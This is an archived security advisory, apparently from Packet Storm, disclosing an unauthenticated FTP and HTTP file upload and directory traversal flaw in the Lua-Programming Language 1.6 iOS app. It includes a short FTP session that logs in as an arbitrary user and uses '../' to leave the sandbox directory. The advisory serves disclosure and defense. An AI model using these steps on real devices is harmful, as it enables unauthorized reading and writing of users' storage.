what you don't know can hurt you

Lua-Programming Language 1.6 File Upload

Lua-Programming Language 1.6 File Upload
Posted Sep 10, 2013
Authored by Larry W. Cashdollar

Lua-Programming Language version 1.6 for iOS suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
systems | apple
MD5 | 139a992449f564dac5072f810be478f2

Lua-Programming Language 1.6 File Upload

Change Mirror Download
TITLE: Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS

Date: 8/1/2013

Author: Larry W. Cashdollar, @_larry0

Download:
https://itunes.apple.com/us/app/lua-programming-language/id505972017?mt=8&ls=1
http://www.tayutec.com/indexen.html

Description: "Please download the "lua-programming language new". And do the following steps before using the app, you 'll give me a five-star praise ! ! http://sosilen.blog.163.com/blog/static/7727956620121029843220/
You can control the background image, and execution voice , text color and shadow , the number and the order of the main interface of the tab bar to create your learning software.
You can enter Lua code by keyboard, and then you can execut the Lua code.
You can save Lua code and learning materials, and can be modified to the save file and delete the save file .
You can Learn Lua knowledge , the system provides some basic learning materials .
You can use Lua code or learning materials to generate two-dimensional code , for easy sharing."

One of the features is the ability to upload files via ftp & http when the 'Computer<->This machine' is selected.


Vulnerabilities: 'iOSftp' & http unauthenticated file uplolads. The application is sandboxed, but any remote user can read/write to the devices storage.

The uploaded content is served out of the http servers directory. While the http server doesn't process server side scripts it is possible to upload and serve malicious / illegal content. 
I would think it's also possible to fill up the devices storage as well but did not test it.
larry$ ftp 192.168.0.31 10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password:
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /private/var/mobile/Applications/9004C5D8-8154-406A-8D04-CE1C035BF813/Documents/ftp
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp>
http server listening on port 8080 allows arbitrary file writes to storage.
You can create directories out side the upload path through the file upload web interface and the .. bug.
Because the application is sandbox I was unable to overwtite application executables and components so impact is limited. As stated above you can serve malicious content (javascript/html) via http.

Vendor: Notified 8/1/2013, https://twitter.com/tayutec
Advisory: http://vapid.dhs.org/advisories/lua-ios-Huang-XiaoWen.html

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close